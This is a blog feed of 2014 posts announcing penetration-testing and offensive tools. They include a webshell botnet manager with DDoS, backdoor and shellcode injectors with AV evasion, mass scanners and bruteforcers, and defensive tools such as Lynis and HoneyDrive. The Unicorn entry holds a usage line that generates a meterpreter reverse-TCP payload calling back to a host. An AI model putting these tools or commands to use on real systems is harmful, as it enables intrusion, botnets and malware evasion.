Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

QuasiBot - Webshell Manager aka HTTP Botnet

July 30, 2014, 5:41 pm
$
0
0

QuasiBot is a complex webshell manager written in PHP, which operate on web-based backdoors implemented by user himself. Using prepared php backdoors, quasiBot will work as C&C trying to communicate with each backdoor. Tool goes beyond average web-shell managers, since it delivers useful functions for scanning, exploiting and so on. It is quasi-HTTP botnet, therefore it is called.

All data about bots is stored in SQL database, ATM only MySQL is supported. TOR proxy is also supported, the goal was to create secure connection between C&C and backdoors; using SOCKS5, it is able to torify all connections between you and web server. All configuration is stored in config file. QuasiBot it's still under construction so i am aware of any potential bugs.

You will need any web server software; tested on Linux, Apache 2.2 and PHP 5.4.4.

How it works?

  • quasiBot is operating on web-shells delivered by user, each backdoor is being verified by md5 hash which changes every hour
    quasiBot (C&C) -[request/verification]-> Bots (Webshells) -[response/verification]-> quasiBot (C&C) -[request/command]-> Bots (Webshells) -[response/execution]-> quasiBot (C&C)
  • Backdoors consists of two types, with and without DDoS module, source code is included and displayed in home page;
  • Connection between C&C and server is being supported by curl, TOR proxy is supported, User Agent is being randomized from an array
    quasiBot (C&C) -[PROXY/TOR]-> Bots (Webshells) <-[PROXY/TOR]- quasiBot (C&C)
  • Webshells can be removed and added at 'Settings' tab, they are stored in database
  • 'RSS' tab contain latest exploits and vulnerabilities feeds
  • 'RCE' tab allows to perform Remote Code Execution on specific server using selected PHP function
  • 'Scan' tab allows to resolve IP or URL and perform basic scan using nmap, dig and whois - useful in the phase of gathering information
  • 'Pwn' tab stands for few functions, which generally will help collect informations about server and try to find exploits for currently used OS version using Linux Exploit Suggestor
  • 'MySQL Manager', as the name says, can be used to perform basic operations on specific database - it could be helpful while looking for config files that include mysql connections on remote server; it also displays some informations about it's envoirment
  • 'Run' tab allows you to run specific command on every bots at once
  • 'DDoS' tab allows you to perform UDP DoS attacks using all bots or single one, expanded backdoor is required
  • Whole front-end is maintaned in a pleasant, functional interface

Running quasi for first time

  • Move all files to prepared directory, change default settings in config file (config.php)
  • Visiting quasiBot for the first time will create needed database and it's structure
  • In 'Settings' tab, you are able to add and delete shells, you're ready to go

Todo

  • Authorization system
  • Move Linux Exploit Suggestor to PHP language
  • Add Windows support to 'PWN' module
  • Automatic attacks on servers
  • Backdoors creation (backconnects)
  • Source code cleanup, it's still pretty shitty; amount of required files should be reduced
  • ???

Search

Bing Dork Scanner - Tool to extract urls from a bing search

July 30, 2014, 5:44 pm
$
0
0

This is a simple script with GUI, to extract urls from a bing search.

Support only HTTP proxy.

Required Perl Modules:
  • LWP
  • Gtk2
  • Glib
  • uft8
  • threads
  • threads::shared
  • URI::Escape

Sandcat Browser 5 - A Penetration-Oriented Browser

July 30, 2014, 5:51 pm
$
0
0

Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers.

Here is what changed in version 5.0 beta 1:
  • Faster startup and responsiveness.
  • Huge refactoring and cleanup of the current code.
  • The Chromium library was upgraded to the latest release (incredibly fast!).
  • Improved compatibility with 64-bit Windows editions.
  • Improved source code editor.
  • Available as free, open source/community edition (under a BSD-3-Clause license).
  • Built using components and libraries from the Catarinka toolkit (also made open source at the same time with this release and under the same license).
  • Includes the Selenite Lua library - a multi-purpose set of Lua extensions developed to make the development of Lua extensions easier in Sandcat. The code for Selenite is now open source, under the MIT license. The library documentation is available here.
  • Fixed: output of the SHA1 and the full URL encoders that come with the pen-tester pack. 

SlowHTTPTest - Application Layer DoS attack simulator

July 30, 2014, 6:03 pm
$
0
0

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on majority of Linux platforms, OSX and Cygwin - a Unix-like environment and command-line interface for Microsoft Windows.

It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant memory and CPU usage on the server.

Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.


Oracle Password Auditor - Oracle Password Recovery & Auditing Tool

July 31, 2014, 5:35 pm
$
0
0


Oracle Password Auditor is the FREE Oracle database password recovery and auditing software.

It not only helps you to recover lost or forgotten Oracle database password but also audit Oracle database setup in an corporate environment by discovering the weak password configurations.

During auditing operation, it detects special cases such as Account Lockout, Incorrect Oracle SID, Session Limit problems etc. In such cases it stops the operation rather than blindly continuing with the errors. Penetration testers can use this feature to detect any account lockout issues and further verify if it is susceptible to such DDOS attacks.
It uses simple & faster dictionary based password recovery method. Also in the beginning it can automatically check for well known default user/password combinations.

It is very easy to use with a cool GUI interface and a handy tool for IT administrators & Penetration Testers.

It works on wide range of platforms starting from Windows XP to Windows 8.


CountryTraceRoute v1.22 - Fast Traceroute with IP country information

July 31, 2014, 5:41 pm
$
0
0

CountryTraceRoute is a Traceroute utility, similar to the tracert tool of Windows, but with graphical user interface, and it's also much faster than tracert of Windows. CountryTraceRoute also displays the country of the owner of every IP address found in the Traceroute. 

After the Traceroute is completed, you can select all items (Ctrl+A) and then save them into csv/tab-delimited/html/xml file with 'Save Selected Items' option (Ctrl+S) or copy them to the clipboard (Ctrl+C) and then paste the result into Excel or other spreadsheet application.

System Requirements

This utility works on any version of Windows, starting from Windows 2000 and up to Windows 8. Both 32-bit and x64 systems are supported.


FuckShitUp - Multi Vulnerabilities Scanner written in PHP

July 31, 2014, 5:57 pm
$
0
0

Basically, FSU is bunch of tools written in PHP-CLI. Using build-in functions, you are able to grab url's using search engines - and so, dork for interesting files and full path disclosures. Using list of url's, scanner will look for Cross Site Scripting, Remote File Inclusion, SQL Injection and Local File Inclusion vulnerabilities. It is able to perform mass bruteforce attacks for specific range of hosts, or bruteforce ssh with specific username taken from FPD. Whenever something interesting will be found, like vulnerability or broken auth credentials, data will be saved in .txt files - just like url's, and any other files. FSU is based on PHP and text files, it's still under construction so i am aware of any potential bugs. Principle of operation is simple.
More url's -> more vuln's. For educational purposes only.

Intro

  • Data grabbing:
    • URL's (geturl/massurl) -> (scan)
    • Configs, Databases, SQLi's (dork)
    • Full Path Disclosures / Users (fpds) -> (brutefpds)
    • Top websites info (top)
  • Massive scanning
    • XSS, SQLi, LFI, RFI (scan)
    • FTP, SSH, DB's, IMAP (multibruter)
    • Accurate SSH bruteforce (brutefpds)

Plan

  • Web Apps
    • Grab url's via 'geturl' or 'massurl' (massurl requires list of tags as file)
    • Scan url's parameters for vulns with 'scan'
  • Servers
    • Pick target, get ip range
    • Scan for services on each IP and bruteforce with 'multibruter'
    • Grab full path disclosures, and so linux usernames
    • Perform SSH bruteforce for specific user with 'brutefpds'
  • Info grabbing
    • Use 'dork' for automatic dorking
    • Use 'fpds' for full path disclosure grabbing
    • Use 'search' for searching someone in ur databases
    • Use 'top' for scanning all top websites of specific nation
  • Others
    • 'Stat' shows actual statistics and informations
    • 'Show' display specific file
    • 'Clear' and 'filter' - remove duplicates, remove blacklisted url's

Others

MultiBrtuer requirements (php5):
  • php5-mysql - for mysql connections
  • php5-pgsql - for postgresql connections
  • libssh2-php - for ssh connections
  • php5-sybase - for mssql connections
  • php5-imap - for imap connections
TODO:
  • Fix problems with grabbing large amount of url's
  • More search engines
  • SQL Injector
  • RFI shell uploader
  • FSU is not secure as it should be

Lynis 1.5.9 - Security auditing tool for Unix/Linux systems

August 1, 2014, 6:27 am
$
0
0

Lynis is an open sourcesecurity auditing tool. Primary goal is to help users with auditing and hardening of Unix and Linux based systems. The software is very flexible and runs on almost every Unix based system (including Mac). Even the installation of the software itself is optional!

How it works

Lynis will perform hundreds of individual tests to determine the security state of the system. Many of these tests are also part of common security guidelines and standards. Examples include searching for installed software and determine possible configuration flaws. Lynis goes further and does also test individual software components, checks related configuration files and measures performance. After these tests, a scan report will be displayed with all discovered findings.
Typical use cases for Lynis:
  • Security auditing
  • Vulnerability scanning
  • System hardening
Why open source?

Open source software provides trust by having people look into the code. Adjustments are easily made, providing you with a flexible solution for your business. But can you trust systems and software with your data? Lynis provides you this confidence. It does so with extensive auditing of your systems. This way you can verify and stay in control of your security needs.


System Auditing

Auditing made easy

With IT departments already under pressure, the demand for securing systems is only getting higher. This is why regular system auditing is required.
Unfortunately, manual checking is too much work and most solutions only present the issues. With Lynis Enterprise auditing is quick, easy and affordable.

Extensive

Audits performed by Lynis are extensive. From the bootloader up to the last piece of software, it all gets checked. Any vulnerable package, weak configuration value or unneeded daemon will show up sooner or later.

System Hardening

Limiting the weak spots

To increase the defenses of a system, additional security measures have to be implemented. This process of fortification is named system hardening. It consists of removing unnecessary parts, limit default access and tighten up the permissions of processes and users. While Unix based systems are fairly secure by default, the need of system hardening will always exist.
Hardening systems without the right tools, can take a lot of time. Besides investigating, the changes have to be planned, implemented and tested at several stages.

Auditing and Hardening

Our solution performs an in-depth audit, to determine the applicable hardening controls. Together with these controls the right suggestions are selected for your environment. A customized plan will be part of your system hardening efforts. To simplify the process of system hardening, hardening snippets are provided. Almost as simple as a copy-paste, you can harden the system of your workstations and servers.

Technical details

The hardening snippets used are depending on the related control. Usually there is a piece of shell script available to test for a specific control, or to implement the related control. Where possible and applicable, also snippets are provided for configuration management tools like cfengine, Chef and Puppet.

Vulnerability Scanning

Weaknesses

Discovering weaknesses in IT security is named vulnerability scanning. It is the art of finding weaknesses, before malicious people do. These vulnerabilities may exist in essential parts of the operating system, software, or even configuration files.

Best of all worlds

Our solution focuses on host based scanning, combined with scanning via the network. This way more ground is covered and better insights can be provided. Solutions only using network scanning are nowadays not extensive enough.
Most of the vulnerability tests are already built-in. With the help of plugins, additional tests are performed to discover vulnerabilities. Also information is collected, which can be used to determine weaknesses in unexpected areas.




Search

BackdoorFactory - Patch PE (x86/x64) and ELF (x86/x64 and ARM LE x32) binaries with shellcode

August 4, 2014, 7:39 am
$
0
0
Patch win86/64 PE and linux86/64 binaries with shellcode. The goal of The Backdoor Factory is to patch executable binaries with user desired shellcode and continue normal execution of the binary prepatched state. Under a BSD 3 Clause License.

This is done by either appending a code cave or using existing code caves of the executable. This project includes several customized metasploit shellcodes. Plus a new shellcode loadliba_reverse_tcp: designed to bypass all the protections of EMET 4.1. Also, the user can provide their own shellcode for use.

This update provides the loadliba_reverse_tcp shellcode, stability fixes, and speed improvements.

Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x32, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel
                        level="highestAvailable"'. If this string is included
                        in the binary, it must run as system/admin. Doing this
                        slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs. 
                        Patches by default.

Features:

PE Files

Can find all codecaves in an EXE/DLL.
By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
Can inject shellcode into code caves or into a new section.
Can find if a PE binary needs to run with elevated privileges.
When selecting code caves, you can use the following commands:
  -Jump (j), for code cave jumping
  -Single (s), for patching all your shellcode into one cave
  -Append (a), for creating a code cave
  -Ignore (i), nevermind, ignore this binary
Can ignore DLLs.

ELF Files

Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.

Overall

The user can :
  -Provide custom shellcode.
  -Patch a directory of executables/dlls.
  -Select x32 or x64 binaries to patch only.
  -Include BDF is other python projects see pebin.py and elfbin.py


VNCPassView - Recover the passwords stored by VNC

August 5, 2014, 7:54 pm
$
0
0

VNCPassView is a small utility that recover the passwords stored by the VNC tool. It can recover 2 of passwords: password stored for the current logged-on user (HKEY_CURRENT_USER in the Registry), and password stored for the all users.

Using VNCPassView
This utility doesn't require any installaion process or additional DLLs. Just run the executable file (VNCPassView.exe), and the VNC passwords will be displayed, if they are stored on your computer.


Facebook Password Remover - All-in-one Facebook Login Password Removal Tool

August 5, 2014, 7:59 pm
$
0
0

Facebook Password Remover is the free all-in-one tool to quickly remove the stored Facebook Login passwords from your system.

This helps you to delete any accidently (or otherwise) stored Facebook password on any public/shared computers so that your Facebook account remains safe.

Currently it supports Facebook password removal from following applications,
  • Firefox
  • Internet Explorer [v7.x - v10.x]
  • Google Chrome
  • Google Chrome Canary/SXS
  • CoolNovo Browser
  • Opera Next
  • Comodo Dragon Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Flock Browser
One of the unique feature of this tool is that it allows you to remove even the encrypted Facebook passwords, belonging to any user account either on local system or any other computer.

Before removing the passwords, you can also take a backup of recovered Facebook password list in HTML/XML/TEXT format.

Facebook Password Remover is fully Portable and works on both 32-bit/64-bit platforms starting from Windows XP to Windows 8.


Features
  • Instantly decrypt and show all the Facebook passwords on your system
  • Remove either selected ones or all the stored Facebook passwords with just a click
  • Support recovery and removal from latest versions of Applications
  • Create backup password report in HTML/XML/TEXT format
  • Auto detects the current password store location
  • Remove password from any user account on local or another system
  • Remove even encrypted Facebook passwords
  • Free and Easy to Use GUI based Tool
  • Fully portable, can be run anywhere without JAVA, .NET components
  • Includes Installer for local Installation & Uninstallation


DomainHostingView v1.61 - Show domain hosting information

August 5, 2014, 8:04 pm
$
0
0

DomainHostingView is a utility for Windows that collects extensive information about a domain by using a series of DNS and WHOIS queries, and generates HTML report that can be displayed in any Web browser. 

The information displayed by the report of DomainHostingView includes: the hosting company or data center that hosts the Web server, mail server, and domain name server (DNS) of the specified domain, the created/changed/expire date of the domain, domain owner, domain registrar that registered the domain, list of all DNS records, and more...

Features

  • DomainHostingView is a Unicode application and this it can display properly WHOIS records containing non-English characters.
  • DomainHostingView supports Internationalized domain names (IDN). When you type a domain with non-English characters, DomainHostingView automatically converts it into a format that can be used in the WHOIS and DNS servers.
  • DomainHostingView parses the text returned by the WHOIS servers, extracts the important data, and displays it in easy-to-read summary.
  • DomainHostingView also displays the raw text returned by the WHOIS servers, with a small enhancement - every http link is displayed as clickable link that opens the Web page in a new window. 

Start Using DomainHostingView

DomainHostingView doesn't require any installation process or additional dll files. In order to start using it, simple run the executable file - DomainHostingView.exe 
Below the menu and the toolbar of DomainHostingView, you should type the domain that you want to inspect, and then click the 'Go' button or press F9. Be aware that you should type only the domain name, without the www prefix of the Web site. 
After you pressed F9, you should wait 2 - 15 seconds to collect the information about the specified domain. When DomainHostingView finishes to collect the domain information, the report is displayed on the main window, and you can use the 'Save HTML Report' to save the report into a file.

About The Domain Report of DomainHostingView

Here's the description of every section in the report of DomainHostingView:
  • Summary Information:In this section, you get a summary of the information extracted from the DNS and WHOIS queries:
    • Domain is registered with... Specifies the domain registrar that registered the domain (Like GoDaddy, NetworkSolutions, and others)
    • Domain is registered to...The owner of the domain. If the domain is protected by privacy service, DomainHostingView specifies that the name you see is not the real domain owner.
    • Web site is hosted by...Specifies the name of the hosting company or data center that hosts the Web site of this domain.
    • Mail Server is hosted by...Specifies the name of the hosting company or data center that hosts the mail server of this domain. For some domains, Web site and mail services are hosted in the same server, while others use different hosting companies for Web site and email services. 
      For example, there are many companies that use the Gmail service of Google to send and receive all their emails, while their Web site is hosted in another hosting company.
    • Domain Name Server (DNS) is hosted by...Specifies the name of the hosting company or data center that hosts the DNS server of this domain. For some domains, the Web site and DNS server are hosted in the same company, while others use a separated DNS hosting service
    • Domain was created on...Specifies the date that the domain was created.
    • Domain was last updated on...Specifies the date that the domain was updated.
    • Domain expires on...Specifies the date that the domain expires.
    • Web site is hosted on...Specifies whether the Web site is hosted on Linux/Unix or Windows server. (In order to get this information, DomainHostingView sends a simple HTTP query to the server, and parses the server response)
    Be aware that some of the above fields will be displayed only for some of the domains.
  • DNS Records:In this section, you get a table with all major DNS records (MX, A, NS, SOA) that can be extracted from the specified domain. For every IP address found in the other DNS records, DomainHostingView also extract the PTR record (Reverse DNS lookup)
  • Subdomains:This section won't be displayed for most of the domains, because most DNS servers block the ability to extract the Subdomains of a domain. If DomainHostingView manages to extract the Subdomains list from the DNS server, it'll be displayed in a simple table with the IP address and Subdomain string.
  • IP Addresses Information:This section provides a table with IP addresses information of the hosting company or data center that hosts the Web site, the mail server, and the domain name server.
  • Raw Domain Information:This section provides the raw text returned from the WHOIS query of the domain.
  • Web Server IP Address Information:This section provides the raw text returned from the WHOIS query of the Web server IP address.
  • Mail Server IP Address Information:This section provides the raw text returned from the WHOIS query of the mail server IP address.
  • Name Server IP Address Information:This section provides the raw text returned from the WHOIS query of the domain name server IP address.    

Web-Fu - Chrome extension for pentesting web applications

August 5, 2014, 8:12 pm
$
0
0

Chrome extension for pentesting web applications. Web-fu Is a web hacking tool focused on discovering and exploiting web vulnerabilitites.

Is a Browser embedded webhacking tool. Some tools, doesn't support certifiacte auhtentication or web vpn accesses. If the browser can authenticate on the application for inside scanning, this hacking tool can too becouse is embedded.

Very comfortable way of website auditing.

Main functionalities:

 - visual web crawling
 - visual form cracking
 - get/post bruteforcing and fuzzing
 - real rendering
 - gauss based false positive reductor
 - encoding/decoding
 - portscan 
 - cookie editor
 - web notes
 - request interceptor
 - http logger 
 - vulnerability scanner
 - build request
 - session locker
 - exploit multi-search

With webfu, you will do the best web site pentest and vulnerability assessment.


HoneyDrive 3 - The Premier Honeypot Linux Distro

August 7, 2014, 7:45 pm
$
0
0

HoneyDrive is the premier honeypot Linux distro. It is a virtual appliance (OVA) with Xubuntu Desktop 12.04.4 LTS edition installed. It contains over 10 pre-installed and pre-configured honeypot software packages such as Kippo SSH honeypot, Dionaea and Amun malware honeypots, Honeyd low-interaction honeypot, Glastopf web honeypot and Wordpot, Conpot SCADA/ICS honeypot, Thug and PhoneyC honeyclients and more. Additionally it includes many useful pre-configured scripts and utilities to analyze, visualize and process the data it can capture, such as Kippo-Graph, Honeyd-Viz, DionaeaFR, an ELK stack and much more. Lastly, almost 90 well-known malware analysis, forensics and network monitoring related tools are also present in the distribution.

FEATURES:

  • Virtual appliance based on Xubuntu 12.04.4 LTS Desktop.
  • Distributed as a single OVA file, ready to be imported.
  • Full LAMP stack installed (Apache 2, MySQL 5), plus tools such as phpMyAdmin.
  • Kippo SSH honeypot, plus Kippo-Graph, Kippo-Malware, Kippo2MySQL and other helpful scripts.
  • Dionaea malware honeypot, plus DionaeaFR and other helpful scripts.
  • Amun malware honeypot, plus helpful scripts.
  • Glastopf web honeypot, along with Wordpot WordPress honeypot.
  • Conpot SCADA/ICS honeypot.
  • Honeyd low-interaction honeypot, plus Honeyd2MySQL, Honeyd-Viz and other helpful scripts.
  • LaBrea sticky honeypot, Tiny Honeypot, IIS Emulator and INetSim.
  • Thug and PhoneyC honeyclients for client-side attacks analysis, along with Maltrieve malware collector.
  • ELK stack: ElasticSearch, Logstash, Kibana for log analysis and visualization.
  • A full suite of security, forensics and anti-malware tools for network monitoring, malicious shellcode and PDF analysis, such as ntop, p0f, EtherApe, nmap, DFF, Wireshark, Recon-ng, ClamAV, ettercap, MASTIFF, Automater, UPX, pdftk, Flasm, Yara, Viper, pdf-parser, Pyew, Radare2, dex2jar and more.
  • Firefox add-ons pre-installed, plus extra helpful software such as GParted, Terminator, Adminer, VYM, Xpdf and more.

HoneyDrive 3 RELEASE NOTES:

1) HoneyDrive 3 has been created entirely from scratch. It is based on Xubuntu Desktop 12.04.4 LTS edition and it is distributed as a standalone OVA file that can be easily imported as a virtual machine using virtualization software such as VirtualBox and VMware.
2) All the honeypot programs from the previous version of HoneyDrive are included, while they have also been upgraded to their latest versions and converted almost entirely to cloned git repos for easier maintenance and updating. This latter fact on its own could be considered reason enough to release the new version.
3) Many new honeypot programs have been installed that really make HoneyDrive 3 “complete” in terms of honeypot technology, plus around 50(!) new security related tools in the fields of malware analysis, forensics and network monitoring.
4) The main honeypot software packages and BruteForce Lab’s projects reside in /honeydrive. The rest of the programs reside in /opt. The location of all software can be found inside the README.txt file on the desktop.
5) HoneyDrive 3 doesn’t make itself as known to the outside world as the previous version. There are no descriptive messages and apart from Kippo-Graph and Honeyd-Viz every other piece of software is not accessible from the outside (unless if you configure them otherwise, or even lock down Kippo-Graph and Honeyd-Viz as well).
A note on versioning: previous versions of HoneyDrive started with a zero (0.1 and 0.2) which seemed confusing to some. I didn’t like it either and in the end I decided to “renumber” those as versions 1 and 2, essentially making this new version HoneyDrive 3, .i.e the third official release.

FREQUENTLY ASKED QUESTIONS:

  1. Why use HoneyDrive?
    HoneyDrive saves you time! It has all the major honeypot-related software pre-installed and pre-configured to work out of the box (or with some configuration options of your liking). As I have seen many times in comments or support requests I get, setting up a honeypot system is not always something easy. This is especially true for new infosec enthusiasts or sysadmins and “hard” to set up software like Dionaea for example.
  2. What utilities and software are included in HoneyDrive?
    HoneyDrive contains all the major honeypot-related software and a ton more useful tools. For a complete list you’ll have to take a look at the README.txt file included in the virtual appliance (you’ll find it on the desktop) or online at the downloads section of SourceForge (link above).
  3. Why isn’t [insert-name-here] included in HoneyDrive?
    Unfortunately I can’t keep track of every different piece of software. But, I’m very open to suggestions about HoneyDrive! If you know a tool that could be of benefit please let me know by leaving a comment on this page and it will be included in the next release of HoneyDrive.
  4. What is the password for [insert-name-here]?
    Again, your best bet is reading the README.txt file included in the virtual appliance or found online at the downloads section of SourceForge (link above). Every password you will need is included in its appropriate section.

CHAGELOG:

HoneyDrive 3
  • Upgraded ALL existing honeypot software to the corresponding latest versions.
  • Converted ALL existing honeypot software to cloned git repos for easier maintenance.
  • Removed distinguishable HoneyDrive artifacts and secured access to web tools.
  • Added Kippo-Malware and Kippo2ElasticSearch.
  • Added Conpot SCADA/ICS honeypot.
  • Added PhoneyC honeyclient.
  • Added maltrieve malware downloader.
  • Added the ELK stack (ElasticSearch, Logstash, Kibana).
  • Added the following security tools: dnstop, MINI DNS Server, dnschef, The Sleuth Kit + Autopsy, TekCollect, hashMonitor, corkscrew, cryptcat, socat, hexdiff, pdfid, disitool, exiftool, Radare2, chaosreader, netexpect, tcpslice, mitmproxy, mitmdump, Yara, Recon-ng, SET (Social-Engineer Toolkit), MASTIFF + MASTIFF2HTML, Viper, Minibis, Nebula, Burp Suite, xxxswf, extract_swf, Java Decompiler (JD-GUI), JSDetox, extractscripts, AnalyzePDF, peepdf, officeparser, DensityScout, YaraGenerator, IOCExtractor, sysdig, Bytehist, PackerID, RATDecoders, androwarn, passivedns, BPF Tools, SpiderFoot, hashdata, LORG.
  • Added the following extra software: 7zip, Sagasu.
  • Added the following Firefox add-ons: Disconnect, Undo Closed Tabs Button, PassiveRecon.
  • Removed the following software: Kojoney, mwcrawler, Vidalia, ircd-hybrid, DNS Query Tool, DNSpenTest, VLC, Parcellite, Open Penetration Testing Bookmarks Collection (Firefox).

Unicorn - Tool for using a PowerShell downgrade attack and inject shellcode straight into memory

August 7, 2014, 7:44 pm
$
0
0
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.

root@bt:~/Desktop# python unicorn.py
                                                     ,/
                                                    //
                                                  ,//
                                      ___   /|   |//
                                  `__/\_ --(/|___/-/
                               \|\_-\___ __-_`- /-/ \.
                              |\_-___,-\_____--/_)' ) \
                               \ -_ /     __ \( `( __`\|
                               `\__|      |\)\ ) /(/|
       ,._____.,            ',--//-|      \  |  '   /
      /     __. \,          / /,---|       \       /
     / /    _. \  \        `/`_/ _,'        |     |
    |  | ( (  \   |      ,/\'__/'/          |     |
    |  \  \`--, `_/_------______/           \(   )/
    | | \  \_. \,                            \___/\
    | |  \_   \  \                                 \
    \ \    \_ \   \   /                             \
     \ \  \._  \__ \_|       |                       \
      \ \___  \      \       |                        \
       \__ \__ \  \_ |       \                         |
       |  \_____ \  ____      |                        |
       | \  \__ ---' .__\     |        |               |
       \  \__ ---   /   )     |        \              /
        \   \____/ / ()(      \          `---_       /|
         \__________/(,--__    \_________.    |    ./ |
           |     \ \  `---_\--,           \   \_,./   |
           |      \  \_ ` \    /`---_______-\   \\    /
            \      \.___,`|   /              \   \\   \
             \     |  \_ \|   \              (   |:    |
              \    \      \    |             /  / |    ;
               \    \      \    \          ( `_'   \  |
                \.   \      \.   \          `__/   |  | 
                  \   \       \.  \                |  |
                   \   \        \  \               (  )
                    \   |        \  |              |  |
                     |  \         \ \              I  `
                     ( __;        ( _;            ('-_';
                     |___\        \___:            \___:

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage:
python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443


Search

Shellter v1.7 - Dynamic ShellCode Injector Tool

August 7, 2014, 7:57 pm
$
0
0

Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants and/or he chooses Basic Mode), adding an extra section with RWE access,and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

How does it work?

Shellter uses a unique dynamic approach which is based on the execution flow of the target application. This means that no static/predefined locations are used for shellcode injection. Shellter will launch and trace the target, while at the same time will log the execution flow of the application.

What does it trace?

Shellter traces the entire execution flow that occurs in userland. That means,code inside the target application  itself (PE image), and code outside of it that might be in a system dll or on a heap, etc. This happens in order to ensure that functions actually belonging to the target executable, but are only used as callback functions for Windows APIs will not be missed.

However, the tracing engine will not log any instructions that are not in the memory range of the PE image of the target application, since these cannot be used as a reference to permanently inject the shellcode.

Why do I need Shellter?
Bypass AVs.

Executables created through Metasploit are most likely detected by most AV vendors. By using Shellter, you automatically have an infinitely polymorphic executable template, since you can use any 32-bit ‘standalone’ native Windows executable to host your shellcode. By ‘standalone’ means an executable that  doesn’t need any proprietary DLLs, apart from the system DLLs to load and run. For example, notepad.exe, and many other applications you can find online, or create by yourself as your own custom templates.

You can also use applications that make use of proprietary DLLs if those are not required to create the process in the first place, and are normally loaded later on if needed to execute code for a specific task. In case you select an application that needs one or more proprietary DLLs to create the process in the first place then you will have to include them in the same directory from where you load the main executable. However, this is not recommended since it is more convenient to have just a single executable to upload to the target.

What types of apps can I use?

You can basically use any 32-bit standalone (see above) native Windows application. Of course, since the main goal is to bypass an AV,you should always avoid packed applications or generally applications that have ‘dodgy’
characteristics such as sections with RWE permissions, more than one sections containing executable code etc..

Another reason why you should avoid packed applications is because advanced packers will also check for modifications of the file, so you will probably just break it. Advanced packers also perform various anti-reversing tricks which will detect Shellter’s debugging engine during tracing. If you are a lover of packers, you can first perform the injection and then pack the application with the packer of your choice.

The best bet is to use completely legitimate looking applications (ideally not packed) that are not flagged by any AV vendor for any reason.

These can be either yours, or something you got online.

Can I use encoded/self-decrypting payloads?

Shellter also supports encoded/self-decrypting payloads by taking advantage of  the Imports Table of the application. It will look for specific imported APIs that can be used on runtime to execute a self-decrypting payload without doing any modifications in the section’s characteristics from inside the PE Header.

At the moment 7 methods are supported for loading encoded payloads:
  •     VirtualAlloc
